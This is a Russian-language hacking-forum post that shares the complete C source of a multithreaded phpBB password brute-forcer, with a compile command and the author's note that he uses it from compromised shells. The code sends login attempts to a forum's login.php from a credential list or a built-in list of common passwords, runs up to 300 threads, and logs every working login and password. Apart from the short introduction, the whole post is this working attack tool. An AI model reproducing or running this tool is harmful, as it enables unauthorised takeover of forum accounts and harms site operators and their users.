Мой старый брут phpBB, иногда пользуюсь на шеллах (максимальный результат - 30 паролей в сек)
Собирать
gcc -l pthread -l curses pbf.c -o pbf
Код:
/* (C) KEZ <kez@antichat.ru> */
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <getopt.h>
#include <netdb.h>
#include <pthread.h>
#include <time.h>
#include <curses.h>
#include <signal.h>
#include <getopt.h>
#define PHPBB_CHECKPAIR_FORUMERROR -6
#define PHPBB_CHECKPAIR_UNKNOWNRESPONSE -5
#define PHPBB_CHECKPAIR_FORBIDDEN -4
#define PHPBB_CHECKPAIR_NOTFOUND -3
#define PHPBB_CHECKPAIR_SHAREERROR -2
#define PHPBB_CHECKPAIR_CONNECTERROR -1
#define PHPBB_CHECKPAIR_GOOD 0
#define PHPBB_CHECKPAIR_BAD 1
#define PHPBB_GETNEXTPAIR_FILEERROR -1
#define PHPBB_GETNEXTPAIR_EOF 0
#define PHPBB_GETNEXTPAIR_OK 1
#define PHPBB_PASSWORD_LEN 32
#define PHPBB_LOGIN_LEN 25
#define PHPBB_PAIR_LEN PHPBB_PASSWORD_LEN + PHPBB_LOGIN_LEN + 3
#define PHPBB_PATH_LEN 256
#define PHPBB_RESPONSEBUF_LEN 1024
#define MAX_THREADS 300
typedef struct
{
char *hostname;
unsigned int port;
char *ip;
char *path;
int threads;
char *listfile;
char *logfile;
bool single;
bool curses;
} prog_options;
FILE *phpbb_listfile;
FILE *phpbb_logfile;
pthread_t threads[MAX_THREADS];
pthread_t crefresh_thread;
pthread_mutex_t print_mutex = PTHREAD_MUTEX_INITIALIZER;
bool stop_brute = 0;
prog_options prog;
int curr_pass = -1;
char curr_login[PHPBB_LOGIN_LEN];
time_t start_time;
time_t stop_time;
time_t elapsed_time;
unsigned int count_checked = 0;
unsigned int count_good = 0;
float speed = 0;
char tmplogin[PHPBB_LOGIN_LEN];
char copyright[] = "(C) KEZ 2005";
char logo[] = "PHPBB BRUTEFORCE";
/* common passwords list */
char *common_passwords[] =
{
"123", "1234", "12345", "123456", "1234567", "12345678", "87654321", "7654321", "654321", "54321",
"4321", "321", "21", "q", "qw", "qwe", "qwer", "qwert", "qwerty", "qwerty", "ytrewq", "trewq",
"rewq", "ewq", "wq", "1111", "111", "2222", "222", "3333", "333", "4444", "444", "5555", "555",
"6666", "666","7777", "777", "8888", "888", "9999", "999", "101010", "202020", "303030",
"404040", "505050", "606060", "707070", "808080", "909090", "000000", "102030", "302010",
"666666", "112233", "111222333", "q1w2e3", "pass", "password", "passpass"
};
/* PHP explode() analog */
int explode( char *pair, char separator, char *s1, char *s2 )
{
int separator_position;
if (!pair || !s1 || !s2 ) return 0;
if (!separator) separator = ';';
separator_position = strchr( pair, separator ) - pair + 1;
if (!separator_position || separator_position < 0) return 0;
snprintf( s1, separator_position, "%s", pair );
snprintf( s2, strlen( pair ), "%s", pair + separator_position );
return 1;
}
/* Perl chomp() analog */
int chomp( char *s )
{
if (!s) return -1;
if (strstr( s, "\r" ) ) memset( (char*)strstr( s, "\r" ), 0, 1 );
if (strstr( s, "\n" ) ) memset( (char*)strstr( s, "\n" ), 0, 1 );
}
/* DNS resolver */
char *GetIP( char* hostname )
{
struct hostent *he;
struct in_addr in;
he = gethostbyname( hostname );
if (!he) return NULL;
memcpy( &in.s_addr, he->h_addr, he->h_length );
return (char*)inet_ntoa( in );
}
/* login-password pair checker */
int phpbb_checkpair( char *ip, unsigned int port, char *hostname, char *path, char *login, char *password )
{
int s;
struct sockaddr_in s_a;
char *request;
char response[PHPBB_RESPONSEBUF_LEN];
int request_length;
int content_length;
if (!ip || !hostname || !login || !password || !path)
return PHPBB_CHECKPAIR_SHAREERROR;
if (strlen( path ) > PHPBB_PATH_LEN) return PHPBB_CHECKPAIR_SHAREERROR;
s = socket( AF_INET, SOCK_STREAM, 0 );
if (!s) return PHPBB_CHECKPAIR_SHAREERROR;
if (inet_addr( prog.ip ) == -1) return PHPBB_CHECKPAIR_SHAREERROR;
s_a.sin_family = AF_INET;
s_a.sin_port = htons( prog.port );
s_a.sin_addr.s_addr = inet_addr( prog.ip );
if (connect( s, (struct sockaddr*)&s_a, sizeof( s_a ) ) < 0) return PHPBB_CHECKPAIR_CONNECTERROR;
content_length = 42 + strlen( login ) + strlen( password );
request_length = 125 + strlen( hostname ) * 2 + strlen( path ) + content_length;
request = (char*)malloc( request_length );
sprintf( request, "POST http://%s%slogin.php HTTP/1.1\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Connection: Close\n"
"Host: %s\n"
"Content-Length: %d\n"
"\n"
"username=%s&password=%s&redirect=&login=Log+in"
"\n",
hostname, path, hostname, content_length, login, password );
if (send( s, request, request_length, 0 ) < 0) return PHPBB_CHECKPAIR_CONNECTERROR;
free( request );
if (recv( s, response, PHPBB_RESPONSEBUF_LEN, 0 ) < 0) return PHPBB_CHECKPAIR_CONNECTERROR;
close( s );
if (!strncmp( response+9, "404", 3 )) return PHPBB_CHECKPAIR_NOTFOUND;
if (!strncmp( response+9, "403", 3 )) return PHPBB_CHECKPAIR_FORBIDDEN;
if (strncmp( response+9, "200", 3 ) && strncmp( response+9, "302", 3 ))
return PHPBB_CHECKPAIR_UNKNOWNRESPONSE;
if (strstr( response, "phpBB : <b>Critical Error</b>" )) return PHPBB_CHECKPAIR_FORUMERROR;
if (strstr( response, "Location: http://" )) return PHPBB_CHECKPAIR_GOOD;
else return PHPBB_CHECKPAIR_BAD;
}
/* listfile fopen() */
int phpbb_openlistfile( char *filename )
{
if (!filename) return -1;
if (phpbb_listfile) return -1;
phpbb_listfile = fopen( filename, "r" );
if (!phpbb_listfile) return 0;
return 1;
}
/* listfile close() */
int phpbb_closelistfile( void )
{
close( phpbb_listfile );
return 1;
}
/* logfile fopen() */
int phpbb_openlogfile( char *filename )
{
if (!filename) return -1;
if (phpbb_logfile) return -1;
phpbb_logfile = fopen( filename, "w" );
if (!phpbb_logfile) return 0;
return 1;
}
/* logfile close() */
int phpbb_closelogfile( void )
{
close( phpbb_logfile );
return 1;
}
/* add message to log */
int putlog( char *s )
{
if (!phpbb_logfile) return -1;
fputs( s, phpbb_logfile );
fflush( phpbb_logfile );
}
/* read next pair from list file */
int phpbb_getnextpair( char *pair )
{
char BUF[1024];
if (prog.single == 1)
{
if (!common_passwords[curr_pass])
{
curr_pass = 0;
if (ferror( phpbb_listfile )) return PHPBB_GETNEXTPAIR_FILEERROR;
if (!fgets( curr_login, PHPBB_LOGIN_LEN, phpbb_listfile ))
{
if (feof( phpbb_listfile )) return PHPBB_GETNEXTPAIR_EOF;
if (ferror( phpbb_listfile )) return PHPBB_GETNEXTPAIR_FILEERROR;
}
if (!strstr( curr_login, "\n" )) fgets( BUF, 1024, phpbb_listfile );
else chomp( curr_login );
}
sprintf( pair, "%s;%s", curr_login, common_passwords[curr_pass] );
curr_pass++;
return PHPBB_GETNEXTPAIR_OK;
}
if (!phpbb_listfile) return PHPBB_GETNEXTPAIR_FILEERROR;
if (!fgets( pair, PHPBB_PAIR_LEN, phpbb_listfile ))
{
if (feof( phpbb_listfile )) return PHPBB_GETNEXTPAIR_EOF;
if (ferror( phpbb_listfile )) return PHPBB_GETNEXTPAIR_FILEERROR;
}
if (!strstr( pair, "\n" )) fgets( BUF, 1024, phpbb_listfile );
else chomp( pair );
return PHPBB_GETNEXTPAIR_OK;
}
/* curses thread number print */
void PrintCursesThreadNumber( int thread_num )
{
char msg[80];
int i;
memset( msg, ' ', 80 );
sprintf( msg, "%d)", thread_num );
move( 4 + thread_num, 0 );
standout();
addstr( msg );
standend();
}
/* bruting thread */
void *phpbb_brutethread( void* parameter )
{
char pair[PHPBB_PAIR_LEN];
char login[PHPBB_LOGIN_LEN];
char password[PHPBB_PASSWORD_LEN];
int i;
char msg[80];
int thread_num = (int)parameter;
if (!prog.curses) printf( " [INFO] [Thread #%d] <SPAWNED>\n", thread_num );
while (1)
{
if (prog.curses)
{
pthread_mutex_lock( &print_mutex );
PrintCursesThreadNumber( thread_num );
pthread_mutex_unlock( &print_mutex );
}
if (stop_brute)
{
if (!prog.curses) printf( " [INFO] [Thread #%d] <KILLED>\n", thread_num );
pthread_exit( 0 );
}
switch (phpbb_getnextpair( pair ))
{
case PHPBB_GETNEXTPAIR_OK:
memset( login, 0, PHPBB_LOGIN_LEN );
memset( password, 0, PHPBB_PASSWORD_LEN );
if (!explode( pair, ';', login, password ))
{
if (!prog.curses)
printf( " [INFO] [Thread #%d] WRONG LISTFILE FORMAT\n",thread_num );
stop_brute = 1;
continue;
}
if (prog.curses)
{
pthread_mutex_lock( &print_mutex );
move( 4 + thread_num, 6 );
sprintf( msg, "%s;%s\0", login, password );
addstr( msg );
for (i = 0; i <= 80 - strlen( msg ); i++) addch( ' ' );
pthread_mutex_unlock( &print_mutex );
}
switch (phpbb_checkpair( prog.ip, prog.port, prog.hostname, prog.path,
login, password ))
{
case PHPBB_CHECKPAIR_GOOD:
if (!prog.curses)
printf( " [INFO] [Thread #%d] GOOD PAIR: %s;%s\n",
thread_num, login, password );
count_good++;
putlog( "LOGIN: " );
putlog( login );
putlog( " PASSWORD: " );
putlog( password );
putlog( "\n" );
break;
case PHPBB_CHECKPAIR_BAD:
if (!prog.curses)
printf( " [INFO] [Thread #%d] BAD PAIR: %s;%s\n",
thread_num, login,
password );
break;
case PHPBB_CHECKPAIR_SHAREERROR:
endwin();
printf( " [ERROR] [Thread #%d] SHARE ERROR\n", thread_num );
stop_brute = 1;
break;
case PHPBB_CHECKPAIR_CONNECTERROR:
endwin();
printf( " [ERROR] [Thread #%d] CONNECTION FAILED\n", thread_num );
stop_brute = 1;
break;
case PHPBB_CHECKPAIR_UNKNOWNRESPONSE:
endwin();
printf( " [ERROR] [Thread #%d] UNKNOW SERVER RESPONSE\n", thread_num );
stop_brute = 1;
break;
case PHPBB_CHECKPAIR_FORBIDDEN:
endwin();
printf( " [ERROR] [Thread #%d] FORBIDDEN\n", thread_num );
stop_brute = 1;
break;
case PHPBB_CHECKPAIR_NOTFOUND:
endwin();
printf( " [ERROR] [Thread #%d] NOT FOUND\n", thread_num );
stop_brute = 1;
break;
case PHPBB_CHECKPAIR_FORUMERROR:
endwin();
printf( " [ERROR] [Thread #%d] REMOTE ERROR\n", thread_num );
stop_brute = 1;
break;
default: break;
}
count_checked++;
continue;
case PHPBB_GETNEXTPAIR_FILEERROR:
endwin();
printf( " [ERROR] [Thread #%d] LISTFILE READ ERROR\n", thread_num );
stop_brute = 1;
break;
case PHPBB_GETNEXTPAIR_EOF:
endwin();
printf( " [INFO] [Thread #%d] EOF\n", thread_num );
stop_brute = 1;
continue;
default: break;
}
}
return NULL;
}
/* statistics */
void Stats( void )
{
elapsed_time = stop_time - start_time;
if (elapsed_time && count_checked)
speed = (float)count_checked / (float)elapsed_time;
else speed = 0;
printf( "[STATS]\n" );
printf( "Time started : %s", ctime( &start_time ) );
printf( "Time finished : %s", ctime( &stop_time ) );
printf( "Elapsed : %d seconds\n", stop_time - start_time );
printf( "Checked : %d pairs\n", count_checked );
printf( "Good : %d pairs\n", count_good );
printf( "Speed : %f pairs/second\n", speed );
printf( "\n" );
}
/* usage */
void Usage( char *s )
{
printf( "Usage: ./prog -h host [-s port] [-p path] -l listfile\n" );
printf( " [-t threads] [-o outfile] [-P] [-C]\n\n" );
printf( " host : phpBB hostname or IP address\n" );
printf( " port : web server port, 80 by default\n" );
printf( " path : remote path, where phpBB located, ""/"" by default\n" );
printf( " listfile : file with login;password pairs or single login,\n "
" if -P specified\n" );
printf( " threads : number of threads, 1 by default\n" );
printf( " outfile : write bruted pairs to this file, /dev/null by default\n" );
printf( " -P : use common passwords. -l options = single LOGIN\n" );
printf( " -C : use curses lib. graphical output\n" );
printf( "\n" );
if (s) printf( "------- %s-------\n", s );
exit( 0 );
}
/* SIGINT handler */
void sigint_catch( int signo )
{
if (!stop_brute)
{
stop_brute = 1;
if (!prog.curses) printf( "[INFO] [SIGINT Handler] INTERRUPT (Ctrl+C)\n", signo );
}
}
/* config print */
void PrintCursesConfig( void )
{
char msg[1024];
if (!prog.curses)
{
printf( "\n[SETTINGS]\n" );
printf( " HOST : %s\n", prog.hostname );
printf( " IP : %s\n", prog.ip );
printf( " PORT : %d\n", prog.port );
printf( " PATH : %s\n", prog.path );
printf( " LISTFILE : %s\n", prog.listfile );
printf( " THREADS : %d\n", prog.threads );
if (prog.logfile)
printf( " OUTFILE : %s\n", prog.logfile );
printf( " OTHER : " );
if (prog.single) printf( "USE COMMON PASSWORDS " );
if (prog.curses) printf( "USE CURSES OUTPUT" );
if (!prog.single && !prog.curses) printf( "NO" );
printf( "\n\n" );
}
else
{
move( LINES - 6, 2 );
sprintf( msg, "http://%s:%d%s (%s)\n (listfile: %s)"
" (outfile: %s) (threads: %d)",
prog.hostname, prog.port, prog.path, prog.ip, prog.listfile, prog.logfile, prog.threads);
addstr( msg );
}
}
/* curses logo */
void PrintCursesLogo( void )
{
standout();
move( 1, COLS / 2 - strlen( logo ) / 2 );
addstr( logo );
standend();
}
/* curses speed */
void PrintCursesSpeed( void )
{
char msg[20];
elapsed_time = time( NULL ) - start_time;
if (!elapsed_time || !count_checked) return;
speed = (float)count_checked/(float)elapsed_time;
pthread_mutex_lock( &print_mutex );
memset( msg, 0, 20 );
move( LINES - 7, 2 );
sprintf( msg, "SP %f | EL %u | AL %u | GD %u", speed, elapsed_time/60, count_checked, count_good );
addstr( msg );
pthread_mutex_unlock( &print_mutex );
}
/* curses copyright */
void PrintCursesCopyright( void )
{
move( LINES - 2, COLS / 2 - strlen( copyright ) / 2 );
addstr( copyright );
}
/* curses lib. initialize */
void InitCurses( void )
{
initscr();
clear();
PrintCursesLogo();
PrintCursesCopyright();
PrintCursesConfig();
refresh();
}
/* refresh screen */
void *CursesRefresh( void *param )
{
while (1)
{
PrintCursesSpeed();
move( LINES - 1, COLS - 1 );
refresh();
}
}
/* entry point */
int main( int argc, char *argv[] )
{
int i;
opterr = 0;
if (argc < 2) Usage( NULL );
while (i = getopt( argc, argv, "h:s:p:l:t:o:PC" ))
{
if (i == EOF) break;
switch (i)
{
case 'h':
prog.hostname = optarg;
break;
case 's':
prog.port = (unsigned int)atoi( optarg );
break;
case 'p':
prog.path = optarg;
break;
case 'l':
prog.listfile = optarg;
break;
case 't':
prog.threads = (int)atoi( optarg );
break;
case 'o':
prog.logfile = optarg;
break;
case 'P':
prog.single = 1;
break;
case 'C':
prog.curses = 1;
break;
case '?':
printf( "Option error - %c\n", optopt );
Usage( NULL );
}
}
if (!prog.hostname) Usage( "Hostname needed!" );
if (!prog.listfile) Usage( "Listfile needed!" );
if (!prog.logfile) prog.logfile = "/dev/null";
if (!prog.threads) prog.threads = 1;
if (!prog.path) prog.path = "/";
if (!prog.port) prog.port = 80;
if (inet_addr( prog.hostname ) == -1) prog.ip = GetIP( prog.hostname );
else
prog.ip = prog.hostname;
if (prog.curses)
{
InitCurses();
}
else
{
printf( "\nphpBB Bruteforce\n" );
printf( "for education purposes only\n" );
printf( "KEZ <kez@antichat.ru> (C) ANTICHAT.RU. CODED IN 2005 YEAR.\n\n" );
}
signal( SIGINT, sigint_catch );
signal( SIGCHLD, SIG_IGN );
signal( SIGTERM, SIG_IGN );
signal( SIGSEGV, SIG_IGN );
signal( SIGHUP, SIG_IGN );
signal( SIGPIPE, SIG_IGN );
if (phpbb_openlistfile( prog.listfile ) != 1)
{
if (prog.curses) endwin();
printf( "[ERROR] [Main Thread] CANNOT OPEN LISTFILE\n\n" );
exit( 0 );
}
if (prog.logfile) if (phpbb_openlogfile( prog.logfile ) != 1)
{
if (prog.curses) endwin();
printf( "[ERROR] [Main Thread] CANNOT OPEN OUTFILE\n\n" );
exit( 0 );
}
start_time = time( NULL );
if (prog.curses) pthread_create( &crefresh_thread, NULL, CursesRefresh, NULL );
if (!prog.curses) printf( "[INFO] [Main Thread] CREATING THREADS...\n" );
for (i = 1; i <= prog.threads; i++)
{
if (!stop_brute) pthread_create( &threads[i], NULL, phpbb_brutethread, (void*)i );
}
for (i = 1; i <= prog.threads ; i++) pthread_join( threads[i], NULL );
if (!prog.curses) printf( "[INFO] [Main Thread] ALL THREADS KILLED\n\n" );
stop_time = time( NULL );
endwin();
Stats();
if (!prog.single) phpbb_closelistfile();
if (prog.logfile) phpbb_closelogfile();
}
|
